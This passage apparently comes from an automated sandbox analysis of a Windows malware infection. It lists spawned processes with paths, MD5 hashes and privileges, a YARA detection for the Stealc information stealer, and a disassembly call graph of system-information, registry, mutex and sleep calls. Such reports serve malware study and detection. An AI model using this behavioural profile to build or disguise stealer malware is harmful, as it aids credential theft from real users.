                                                                                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                                  Start time:03:50:54
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exe"
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  File size:1'960'448 bytes
                                                                                                                                                                                                                                                  MD5 hash:3D47CE3BB786721E47FC7C5FC4F3ECBE
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                                  Start time:03:50:55
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2992 --field-trial-handle=2872,i,6481085930284923774,17691791159030812359,262144 /prefetch:8
                                                                                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                                  Start time:03:50:56
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe"
                                                                                                                                                                                                                                                  Imagebase:0xb60000
                                                                                                                                                                                                                                                  File size:5'164'032 bytes
                                                                                                                                                                                                                                                  MD5 hash:AC83F35170E7E84000CC5A17472BE30B
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000021.00000002.2973274370.0000000000B61000.00000040.00000001.01000000.0000003E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                                  Start time:03:51:01
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exe"
                                                                                                                                                                                                                                                  Imagebase:0x1b0000
                                                                                                                                                                                                                                                  File size:4'494'336 bytes
                                                                                                                                                                                                                                                  MD5 hash:D6B0130E6CDD9D6FE53D0A4D23EA9CBD
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                                                  Start time:03:51:01
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                                                                                                                                                                  Imagebase:0xdd0000
                                                                                                                                                                                                                                                  File size:439'808 bytes
                                                                                                                                                                                                                                                  MD5 hash:CE27255F0EF33CE6304E54D171E6547C
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:3.6%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:3.6%
                                                                                                                                                                                                                                                    Total number of Nodes:782
                                                                                                                                                                                                                                                    Total number of Limit Nodes:15
                                                                                                                                                                                                                                                    execution_graph 13107 a7a924 13116 a79160 13107->13116 13109 a7a933 shared_ptr 13110 a75b20 2 API calls 13109->13110 13115 a7a9e3 shared_ptr __floor_pentium4 13109->13115 13111 a7a995 13110->13111 13112 a75b20 2 API calls 13111->13112 13113 a7a9bd 13112->13113 13114 a75b20 2 API calls 13113->13114 13114->13115 13119 a791b4 shared_ptr 13116->13119 13117 a75b20 2 API calls 13117->13119 13118 a79473 shared_ptr __floor_pentium4 13118->13109 13119->13117 13124 a7937f shared_ptr 13119->13124 13120 a75b20 2 API calls 13120->13124 13121 a797e5 shared_ptr __floor_pentium4 13121->13109 13122 a796cf shared_ptr 13122->13121 13123 a75b20 2 API calls 13122->13123 13125 a79857 shared_ptr __floor_pentium4 13123->13125 13124->13118 13124->13120 13124->13122 13125->13109 12758 a786e2 12759 a786e6 12758->12759 12760 a786e8 GetFileAttributesA 12758->12760 12759->12760 12761 a786f4 12760->12761 12821 a7aca0 12822 a7adf0 shared_ptr __floor_pentium4 12821->12822 12824 a7ad0c shared_ptr 12821->12824 12824->12822 12825 aa8979 12824->12825 12826 aa8994 12825->12826 12827 aa86d7 4 API calls 12826->12827 12828 aa899e 12827->12828 12828->12824 12854 a740e0 12855 a7412a 12854->12855 12857 a74172 Concurrency::details::_ContextCallback::_CallInContext __floor_pentium4 12855->12857 12858 a73ea0 12855->12858 12859 a73ede 12858->12859 12860 a73f08 12858->12860 12859->12857 12861 a73f18 12860->12861 12864 a72bc0 12860->12864 12861->12857 12865 a72bce 12864->12865 12871 a8b777 12865->12871 12867 a72c02 12868 a72c09 12867->12868 12877 a72c40 12867->12877 12868->12857 12870 a72c18 std::_Throw_future_error 12872 a8b784 12871->12872 12876 a8b7a3 Concurrency::details::_Reschedule_chore 12871->12876 12880 a8caa7 12872->12880 12874 a8b794 12874->12876 12882 a8b74e 12874->12882 12876->12867 12888 a8b72b 12877->12888 12879 a72c72 shared_ptr 12879->12870 12881 a8cac2 CreateThreadpoolWork 12880->12881 12881->12874 12883 a8b757 Concurrency::details::_Reschedule_chore 12882->12883 12886 a8ccfc 12883->12886 12885 a8b771 12885->12876 12887 a8cd11 TpPostWork 12886->12887 12887->12885 12889 a8b747 12888->12889 12890 a8b737 12888->12890 12889->12879 12890->12889 12892 a8c9a8 12890->12892 12893 a8c9bd TpReleaseWork 12892->12893 12893->12889 13001 a72060 13002 a8c5bb __Mtx_init_in_situ 2 API calls 13001->13002 13003 a7206c 13002->13003 13004 a78c60 13005 a78cb0 13004->13005 13006 a75b20 2 API calls 13005->13006 13007 a78cca shared_ptr __floor_pentium4 13006->13007 13144 a786e0 13145 a786e6 13144->13145 13146 a786e8 GetFileAttributesA 13144->13146 13145->13146 13147 a786f4 13146->13147 13210 aaba2d 13211 aaba57 13210->13211 13212 aaba3d __cftof 13210->13212 13211->13212 13213 aa683a __cftof 4 API calls 13211->13213 13213->13212 13385 a73fa0 13386 a73fe2 13385->13386 13387 a74092 13386->13387 13388 a7404c 13386->13388 13391 a73ff5 __floor_pentium4 13386->13391 13389 a73ea0 3 API calls 13387->13389 13392 a735a0 13388->13392 13389->13391 13393 a735d6 13392->13393 13397 a7360e Concurrency::cancel_current_task shared_ptr __floor_pentium4 13393->13397 13398 a72ca0 13393->13398 13395 a7365e 13396 a72bc0 3 API calls 13395->13396 13395->13397 13396->13397 13397->13391 13399 a72cdd 13398->13399 13400 a8be0f InitOnceExecuteOnce 13399->13400 13401 a72d06 13400->13401 13402 a72d11 __floor_pentium4 13401->13402 13403 a72d48 13401->13403 13407 a8be27 13401->13407 13402->13395 13405 a72400 4 API calls 13403->13405 13406 a72d5b 13405->13406 13406->13395 13408 a8be33 std::_Throw_future_error 13407->13408 13409 a8be9a 13408->13409 13410 a8bea3 13408->13410 13414 a8bdaf 13409->13414 13412 a72aa0 5 API calls 13410->13412 13413 a8be9f 13412->13413 13413->13403 13415 a8cb61 InitOnceExecuteOnce 13414->13415 13416 a8bdc7 13415->13416 13417 a8bdce 13416->13417 13418 aa6beb 4 API calls 13416->13418 13417->13413 13419 a8bdd7 13418->13419 13419->13413 13087 a799e8 13089 a799fc 13087->13089 13090 a79a38 13089->13090 13091 a75b20 2 API calls 13090->13091 13092 a79aac 13091->13092 13099 a78a60 13092->13099 13094 a79abd 13095 a75b20 2 API calls 13094->13095 13096 a79be1 13095->13096 13097 a78a60 2 API calls 13096->13097 13098 a79bf2 13097->13098 13100 a78aac 13099->13100 13101 a75b20 2 API calls 13100->13101 13102 a78ac7 shared_ptr __floor_pentium4 13101->13102 13102->13094 13214 a74236 13215 a723d0 5 API calls 13214->13215 13216 a7423f 13215->13216 13231 a79e74 13232 a79e7c shared_ptr 13231->13232 13233 a7a883 Sleep CreateMutexA 13232->13233 13235 a79f4f shared_ptr 13232->13235 13234 a7a8be 13233->13234 12766 a786b0 12767 a786b6 12766->12767 12773 aa6659 12767->12773 12770 a786d6 12772 a786d0 12780 aa65a2 12773->12780 12775 a786c3 12775->12770 12776 aa66e7 12775->12776 12777 aa66f3 __cftof 12776->12777 12779 aa66fd __cftof 12777->12779 12792 aa6670 12777->12792 12779->12772 12781 aa65ae __cftof 12780->12781 12783 aa65b5 __cftof 12781->12783 12784 aaa783 12781->12784 12783->12775 12785 aaa78f __cftof 12784->12785 12788 aaa827 12785->12788 12787 aaa7aa 12787->12783 12790 aaa84a 12788->12790 12789 aad6ef __cftof RtlAllocateHeap 12791 aaa890 ___free_lconv_mon 12789->12791 12790->12789 12790->12791 12791->12787 12793 aa6692 12792->12793 12795 aa667d __cftof ___free_lconv_mon 12792->12795 12793->12795 12796 aa9ef9 12793->12796 12795->12779 12797 aa9f36 12796->12797 12798 aa9f11 12796->12798 12797->12795 12798->12797 12800 ab02f8 12798->12800 12802 ab0304 __cftof 12800->12802 12801 ab030c __cftof __dosmaperr 12801->12797 12802->12801 12804 ab03ea 12802->12804 12805 ab040c 12804->12805 12809 ab0410 __cftof __dosmaperr 12804->12809 12805->12809 12810 aaff91 12805->12810 12809->12801 12811 aaffa2 12810->12811 12812 aaa531 __cftof 4 API calls 12811->12812 12813 aaffc5 12811->12813 12812->12813 12813->12809 12814 aafb7f 12813->12814 12815 aafbcc 12814->12815 12816 aa683a __cftof 4 API calls 12815->12816 12818 aafbdb __cftof 12816->12818 12817 aafe7b __floor_pentium4 12817->12809 12818->12817 12819 aad2e9 4 API calls 12818->12819 12820 aac4ea GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 12818->12820 12819->12818 12820->12818 12829 a788b0 12830 a78908 shared_ptr 12829->12830 12832 a78a1a 12829->12832 12831 a75b20 2 API calls 12830->12831 12830->12832 12831->12830 13126 a72130 13129 a8c62c 13126->13129 13128 a7213a 13130 a8c63c 13129->13130 13131 a8c654 13129->13131 13130->13131 13133 a8ceee 13130->13133 13131->13128 13134 a8cc05 __Mtx_init_in_situ InitializeCriticalSectionEx 13133->13134 13135 a8cf00 13134->13135 13135->13130 13236 a74270 13239 a73a80 13236->13239 13238 a7427b shared_ptr 13240 a73ab9 13239->13240 13241 a73290 6 API calls 13240->13241 13243 a73bf8 13240->13243 13245 a73af9 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 13240->13245 13241->13243 13242 a73290 6 API calls 13246 a73c1f 13242->13246 13243->13242 13243->13246 13244 a73c28 13244->13238 13245->13238 13246->13244 13247 a737d0 4 API calls 13246->13247 13248 a73c9b 13247->13248 13139 aa6974 13140 aa698c 13139->13140 13141 aa6982 13139->13141 13142 aa68bd 4 API calls 13140->13142 13143 aa69a6 ___free_lconv_mon 13142->13143 13440 a8cff7 13441 a8d007 13440->13441 13442 a8d0af 13441->13442 13443 a8d0ab RtlWakeAllConditionVariable 13441->13443 12906 a73c07 12907 a73c11 12906->12907 12910 a73c1f 12907->12910 12913 a73290 12907->12913 12908 a73c28 12910->12908 12932 a737d0 12910->12932 12936 a8c5dc 12913->12936 12915 a7332b 12942 a8c19a 12915->12942 12917 a732fc __Mtx_unlock 12919 a8c19a 5 API calls 12917->12919 12920 a73310 __floor_pentium4 12917->12920 12921 a73337 12919->12921 12920->12910 12923 a8c5dc GetSystemTimePreciseAsFileTime 12921->12923 12922 a732d4 12922->12915 12922->12917 12939 a8bc7c 12922->12939 12924 a7336f 12923->12924 12925 a8c19a 5 API calls 12924->12925 12926 a73376 __Cnd_broadcast 12924->12926 12925->12926 12927 a8c19a 5 API calls 12926->12927 12928 a73397 __Mtx_unlock 12926->12928 12927->12928 12929 a8c19a 5 API calls 12928->12929 12930 a733ab 12928->12930 12931 a733ce 12929->12931 12930->12910 12931->12910 12933 a737dc 12932->12933 12993 a72400 12933->12993 12946 a8c382 12936->12946 12938 a8c5e9 12938->12922 12963 a8baa2 12939->12963 12941 a8bc8c 12941->12922 12943 a8c1c2 12942->12943 12944 a8c1a4 12942->12944 12943->12943 12944->12943 12969 a8c1c7 12944->12969 12947 a8c3d8 12946->12947 12948 a8c3aa __floor_pentium4 12946->12948 12947->12948 12952 a8ce9b 12947->12952 12948->12938 12950 a8ce9b _xtime_get GetSystemTimePreciseAsFileTime 12951 a8c42d __Xtime_diff_to_millis2 12950->12951 12951->12948 12951->12950 12953 a8ceaa 12952->12953 12955 a8ceb7 __aulldvrm 12952->12955 12953->12955 12956 a8ce74 12953->12956 12955->12951 12959 a8cb1a 12956->12959 12960 a8cb2b GetSystemTimePreciseAsFileTime 12959->12960 12961 a8cb37 12959->12961 12960->12961 12961->12955 12964 a8bacc 12963->12964 12965 a8ce9b _xtime_get GetSystemTimePreciseAsFileTime 12964->12965 12968 a8bad4 __Xtime_diff_to_millis2 __floor_pentium4 12964->12968 12966 a8baff __Xtime_diff_to_millis2 12965->12966 12967 a8ce9b _xtime_get GetSystemTimePreciseAsFileTime 12966->12967 12966->12968 12967->12968 12968->12941 12972 a72aa0 12969->12972 12971 a8c1de std::_Throw_future_error 12983 a8be0f 12972->12983 12974 a72abf 12974->12971 12975 a72ab4 __cftof 12975->12974 12976 aaa531 __cftof 4 API calls 12975->12976 12980 aa6bfc 12976->12980 12977 aa8aaf __cftof 4 API calls 12978 aa6c26 12977->12978 12979 aa6c35 12978->12979 12986 aa68bd 12978->12986 12979->12971 12980->12977 12982 aa6c5d ___free_lconv_mon 12982->12971 12989 a8cb61 12983->12989 12987 aa683a __cftof 4 API calls 12986->12987 12988 aa68cf 12987->12988 12988->12982 12990 a8cb6f InitOnceExecuteOnce 12989->12990 12992 a8be22 12989->12992 12990->12992 12992->12975 12996 a8b506 12993->12996 12995 a72432 12998 a8b521 std::_Throw_future_error 12996->12998 12997 aa8aaf __cftof 4 API calls 12999 a8b5cf 12997->12999 12998->12997 13000 a8b588 __cftof __floor_pentium4 12998->13000 13000->12995 12555 a7a786 12556 a7a7a0 12555->12556 12557 a7a7c2 shared_ptr 12555->12557 12556->12557 12558 a7a87e 12556->12558 12562 a7a7d0 12557->12562 12571 a77d00 12557->12571 12561 a7a883 Sleep CreateMutexA 12558->12561 12560 a7a7de 12560->12562 12564 a77d00 7 API calls 12560->12564 12563 a7a8be 12561->12563 12565 a7a7e8 12564->12565 12565->12562 12566 a77d00 7 API calls 12565->12566 12567 a7a7f2 12566->12567 12567->12562 12568 a77d00 7 API calls 12567->12568 12569 a7a7fc 12568->12569 12569->12562 12570 a77d00 7 API calls 12569->12570 12570->12562 12572 a77d66 __cftof 12571->12572 12591 a77eb8 shared_ptr __floor_pentium4 12572->12591 12604 a75b20 12572->12604 12574 a77da2 12575 a75b20 2 API calls 12574->12575 12577 a77dcf shared_ptr 12575->12577 12576 a77ea3 GetNativeSystemInfo 12578 a77ea7 12576->12578 12577->12576 12577->12578 12577->12591 12579 a77f0f 12578->12579 12580 a77fe9 12578->12580 12578->12591 12581 a75b20 2 API calls 12579->12581 12582 a75b20 2 API calls 12580->12582 12583 a77f37 12581->12583 12584 a7801c 12582->12584 12585 a75b20 2 API calls 12583->12585 12586 a75b20 2 API calls 12584->12586 12588 a77f56 12585->12588 12587 a7803b 12586->12587 12590 a75b20 2 API calls 12587->12590 12610 aa8a81 12588->12610 12592 a78073 12590->12592 12591->12560 12593 a75b20 2 API calls 12592->12593 12594 a780c4 12593->12594 12595 a75b20 2 API calls 12594->12595 12596 a780e3 12595->12596 12597 a75b20 2 API calls 12596->12597 12598 a7811b 12597->12598 12599 a75b20 2 API calls 12598->12599 12600 a7816c 12599->12600 12601 a75b20 2 API calls 12600->12601 12602 a7818b 12601->12602 12603 a75b20 2 API calls 12602->12603 12603->12591 12606 a75b64 __cftof 12604->12606 12605 a75c27 shared_ptr __floor_pentium4 12605->12574 12606->12605 12607 a75cb7 RegOpenKeyExA 12606->12607 12608 a75d10 RegCloseKey 12607->12608 12609 a75d36 shared_ptr __floor_pentium4 12608->12609 12609->12574 12613 aa86d7 12610->12613 12612 aa8a9f 12612->12591 12614 aa86e9 12613->12614 12618 aa86fe __cftof 12614->12618 12619 aa683a 12614->12619 12617 aa872e 12617->12618 12627 aa8925 12617->12627 12618->12612 12620 aa685a 12619->12620 12621 aa6851 12619->12621 12620->12621 12633 aaa531 12620->12633 12621->12617 12628 aa8962 12627->12628 12629 aa8932 12627->12629 12747 aad2e9 12628->12747 12632 aa8941 __fassign 12629->12632 12742 aad30d 12629->12742 12632->12617 12634 aaa53b __cftof 12633->12634 12639 aaa554 __cftof ___free_lconv_mon 12634->12639 12648 aad6ef 12634->12648 12636 aa687a 12640 aab4bb 12636->12640 12639->12636 12652 aa8aaf 12639->12652 12641 aab4ce 12640->12641 12643 aa6890 12640->12643 12641->12643 12691 aaf46b 12641->12691 12644 aab4e8 12643->12644 12645 aab4fb 12644->12645 12646 aab510 12644->12646 12645->12646 12698 aae571 12645->12698 12646->12621 12651 aad6fc __cftof 12648->12651 12649 aad727 RtlAllocateHeap 12650 aad73a 12649->12650 12649->12651 12650->12639 12651->12649 12651->12650 12653 aa8ab4 __cftof 12652->12653 12657 aa8abf __cftof 12653->12657 12658 aad4f4 12653->12658 12672 aa651d 12657->12672 12660 aad500 __cftof 12658->12660 12659 aad55c __cftof 12659->12657 12660->12659 12661 aad6db __cftof 12660->12661 12662 aad5e6 12660->12662 12663 aad611 __cftof 12660->12663 12664 aa651d __cftof 3 API calls 12661->12664 12662->12663 12675 aad4eb 12662->12675 12663->12659 12667 aaa531 __cftof 4 API calls 12663->12667 12670 aad665 12663->12670 12666 aad6ee 12664->12666 12667->12670 12669 aad4eb __cftof 4 API calls 12669->12663 12670->12659 12671 aaa531 __cftof 4 API calls 12670->12671 12671->12659 12678 aa63f7 12672->12678 12676 aaa531 __cftof 4 API calls 12675->12676 12677 aad4f0 12676->12677 12677->12669 12679 aa6405 __cftof 12678->12679 12680 aa6450 12679->12680 12683 aa645b 12679->12683 12682 aa645a 12689 aaa1c2 GetPEB 12683->12689 12685 aa6465 12686 aa647a __cftof 12685->12686 12687 aa646a GetPEB 12685->12687 12688 aa6492 ExitProcess 12686->12688 12687->12686 12690 aaa1dc __cftof 12689->12690 12690->12685 12692 aaf477 __cftof 12691->12692 12693 aaa531 __cftof 4 API calls 12692->12693 12695 aaf480 __cftof 12693->12695 12694 aaf4c6 12694->12643 12695->12694 12696 aa8aaf __cftof 4 API calls 12695->12696 12697 aaf4eb 12696->12697 12699 aaa531 __cftof 4 API calls 12698->12699 12700 aae57b 12699->12700 12703 aae489 12700->12703 12702 aae581 12702->12646 12706 aae495 __cftof ___free_lconv_mon 12703->12706 12704 aae4b6 12704->12702 12705 aa8aaf __cftof 4 API calls 12707 aae528 12705->12707 12706->12704 12706->12705 12708 aae564 12707->12708 12712 aaa5ee 12707->12712 12708->12702 12713 aaa5f9 __cftof 12712->12713 12714 aad6ef __cftof RtlAllocateHeap 12713->12714 12718 aaa605 __cftof ___free_lconv_mon 12713->12718 12714->12718 12715 aa8aaf __cftof 4 API calls 12716 aaa687 12715->12716 12717 aaa67e 12719 aae370 12717->12719 12718->12715 12718->12717 12720 aae489 __cftof 4 API calls 12719->12720 12721 aae383 12720->12721 12726 aae119 12721->12726 12723 aae38b __cftof 12725 aae39c __cftof ___free_lconv_mon 12723->12725 12729 aae584 12723->12729 12725->12708 12727 aa683a __cftof 4 API calls 12726->12727 12728 aae12b 12727->12728 12728->12723 12730 aae119 __cftof 4 API calls 12729->12730 12733 aae5a4 __cftof 12730->12733 12731 aae61a __cftof __floor_pentium4 12731->12725 12733->12731 12734 aae1ef 12733->12734 12735 aae217 12734->12735 12741 aae2e0 __floor_pentium4 12734->12741 12736 aaf07f __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12735->12736 12735->12741 12737 aae297 12736->12737 12738 ab4cbe __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12737->12738 12739 aae2b8 12738->12739 12740 ab4cbe __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12739->12740 12740->12741 12741->12731 12743 aa683a __cftof 4 API calls 12742->12743 12744 aad32a 12743->12744 12746 aad33a __floor_pentium4 12744->12746 12752 aaf07f 12744->12752 12746->12632 12748 aaa531 __cftof 4 API calls 12747->12748 12749 aad2f4 12748->12749 12750 aab4bb __cftof 4 API calls 12749->12750 12751 aad304 12750->12751 12751->12632 12753 aa683a __cftof 4 API calls 12752->12753 12754 aaf09f __cftof __fassign __freea __floor_pentium4 12753->12754 12754->12746 12833 a72080 12836 a8c5bb 12833->12836 12835 a7208c 12839 a8c305 12836->12839 12838 a8c5cb 12838->12835 12840 a8c31b 12839->12840 12841 a8c311 12839->12841 12840->12838 12842 a8c2ee 12841->12842 12843 a8c2ce 12841->12843 12852 a8cc3a 12842->12852 12843->12840 12848 a8cc05 12843->12848 12846 a8c300 12846->12838 12849 a8c2e7 12848->12849 12850 a8cc13 InitializeCriticalSectionEx 12848->12850 12849->12838 12850->12849 12853 a8cc4f RtlInitializeConditionVariable 12852->12853 12853->12846 13103 a72dc0 13104 a72de8 13103->13104 13105 a8c5bb __Mtx_init_in_situ 2 API calls 13104->13105 13106 a72df3 13105->13106 13425 a77780 13426 a777c1 shared_ptr 13425->13426 13427 a75b20 2 API calls 13426->13427 13429 a77853 shared_ptr 13426->13429 13427->13429 13428 a75b20 2 API calls 13431 a779b3 13428->13431 13429->13428 13430 a77923 shared_ptr __floor_pentium4 13429->13430 13432 a75b20 2 API calls 13431->13432 13434 a779e5 shared_ptr 13432->13434 13433 a77a75 shared_ptr __floor_pentium4 13434->13433 13435 a75b20 2 API calls 13434->13435 13436 a77b4d 13435->13436 13437 a75b20 2 API calls 13436->13437 13438 a77b70 13437->13438 13439 a75b20 2 API calls 13438->13439 13439->13433 13148 a846c0 13150 a84dfd 13148->13150 13149 a84e69 shared_ptr __floor_pentium4 13150->13149 13151 a77d00 7 API calls 13150->13151 13152 a84ffd 13151->13152 13187 a782b0 13152->13187 13154 a85016 13155 a75b20 2 API calls 13154->13155 13156 a85065 13155->13156 13157 a75b20 2 API calls 13156->13157 13158 a85081 13157->13158 13193 a79930 13158->13193 13188 a78315 __cftof 13187->13188 13189 a75b20 2 API calls 13188->13189 13190 a78333 shared_ptr __floor_pentium4 13188->13190 13191 a78357 13189->13191 13190->13154 13192 a75b20 2 API calls 13191->13192 13192->13190 13194 a7996f 13193->13194 13195 a75b20 2 API calls 13194->13195 13196 a79977 13195->13196 13197 a78a60 2 API calls 13196->13197 13198 a79988 13197->13198 13453 a88700 13454 a8875a __cftof 13453->13454 13460 a89ae0 13454->13460 13458 a88809 std::_Throw_future_error 13459 a8879c __floor_pentium4 13473 a89e20 13460->13473 13462 a89b15 13463 a72ca0 5 API calls 13462->13463 13464 a89b46 13463->13464 13477 a89ea0 13464->13477 13466 a88784 13466->13459 13467 a743b0 13466->13467 13468 a8be0f InitOnceExecuteOnce 13467->13468 13469 a743ca 13468->13469 13470 a743d1 13469->13470 13471 aa6beb 4 API calls 13469->13471 13470->13458 13472 a743e4 13471->13472 13474 a89e3c 13473->13474 13475 a8c5bb __Mtx_init_in_situ 2 API calls 13474->13475 13476 a89e47 13475->13476 13476->13462 13478 a89f1f shared_ptr 13477->13478 13481 a89f88 13478->13481 13482 a8a140 13478->13482 13480 a89f6b 13480->13466 13483 a8a1c0 13482->13483 13489 a87040 13483->13489 13485 a8a3ee shared_ptr 13485->13480 13486 a8a1fc shared_ptr 13486->13485 13487 a73ea0 3 API calls 13486->13487 13488 a8a3d6 13487->13488 13488->13480 13490 a87081 13489->13490 13497 a73930 13490->13497 13492 a8711d __cftof 13493 a8c5bb __Mtx_init_in_situ 2 API calls 13492->13493 13496 a872b6 __floor_pentium4 13492->13496 13494 a87271 13493->13494 13502 a72e80 13494->13502 13496->13486 13498 a8c5bb __Mtx_init_in_situ 2 API calls 13497->13498 13499 a73967 13498->13499 13500 a8c5bb __Mtx_init_in_situ 2 API calls 13499->13500 13501 a739a6 13500->13501 13501->13492 13503 a72ec6 13502->13503 13504 a72f3e GetCurrentThreadId 13502->13504 13507 a8c5dc GetSystemTimePreciseAsFileTime 13503->13507 13505 a72faf 13504->13505 13506 a72f54 13504->13506 13505->13496 13506->13505 13512 a8c5dc GetSystemTimePreciseAsFileTime 13506->13512 13508 a72ed2 13507->13508 13509 a72fde 13508->13509 13514 a72edd __Mtx_unlock 13508->13514 13510 a8c19a 5 API calls 13509->13510 13511 a72fe4 13510->13511 13515 a8c19a 5 API calls 13511->13515 13513 a72f79 13512->13513 13517 a8c19a 5 API calls 13513->13517 13518 a72f80 __Mtx_unlock 13513->13518 13514->13511 13516 a72f2f 13514->13516 13515->13513 13516->13504 13516->13505 13517->13518 13519 a8c19a 5 API calls 13518->13519 13520 a72f98 __Cnd_broadcast 13518->13520 13519->13520 13520->13505 13521 a8c19a 5 API calls 13520->13521 13522 a72ffc 13521->13522 13523 a8c5dc GetSystemTimePreciseAsFileTime 13522->13523 13532 a73040 shared_ptr __Mtx_unlock 13523->13532 13524 a73185 13525 a8c19a 5 API calls 13524->13525 13526 a7318b 13525->13526 13527 a8c19a 5 API calls 13526->13527 13528 a73191 13527->13528 13529 a8c19a 5 API calls 13528->13529 13530 a73153 __Mtx_unlock 13529->13530 13531 a73167 __floor_pentium4 13530->13531 13533 a8c19a 5 API calls 13530->13533 13531->13496 13532->13524 13532->13526 13532->13531 13534 a730f2 GetCurrentThreadId 13532->13534 13535 a7319d 13533->13535 13534->13531 13536 a730fb 13534->13536 13536->13531 13537 a8c5dc GetSystemTimePreciseAsFileTime 13536->13537 13538 a7311f 13537->13538 13538->13524 13538->13528 13538->13530 13539 a8bc7c GetSystemTimePreciseAsFileTime 13538->13539 13539->13538 13013 a8d041 13015 a8d052 13013->13015 13014 a8d05a 13015->13014 13017 a8d0c9 13015->13017 13018 a8d0d7 SleepConditionVariableCS 13017->13018 13020 a8d0f0 13017->13020 13018->13020 13020->13015 13021 a73c4e 13022 a73c58 13021->13022 13024 a73c65 13022->13024 13029 a723d0 13022->13029 13025 a73c8f 13024->13025 13026 a737d0 4 API calls 13024->13026 13027 a737d0 4 API calls 13025->13027 13026->13025 13028 a73c9b 13027->13028 13030 a723e4 13029->13030 13033 a8b45d 13030->13033 13041 aa3a1a 13033->13041 13035 a8b4d5 ___std_exception_copy 13048 a8b0dd 13035->13048 13036 a8b4c8 13044 a8ae86 13036->13044 13040 a723ea 13040->13024 13052 aa4e59 13041->13052 13043 a8b485 13043->13035 13043->13036 13043->13040 13045 a8aecf ___std_exception_copy 13044->13045 13047 a8aee2 shared_ptr 13045->13047 13058 a8b2cf 13045->13058 13047->13040 13049 a8b108 13048->13049 13050 a8b111 shared_ptr 13048->13050 13051 a8b2cf 5 API calls 13049->13051 13050->13040 13051->13050 13053 aa4e5e __cftof 13052->13053 13053->13043 13054 aa8abf __cftof 13053->13054 13055 aad4f4 __cftof 4 API calls 13053->13055 13056 aa651d __cftof 3 API calls 13054->13056 13055->13054 13057 aa8af2 13056->13057 13059 a8be0f InitOnceExecuteOnce 13058->13059 13060 a8b311 13059->13060 13061 a8b318 13060->13061 13069 aa6beb 13060->13069 13061->13047 13063 a8b34e 13064 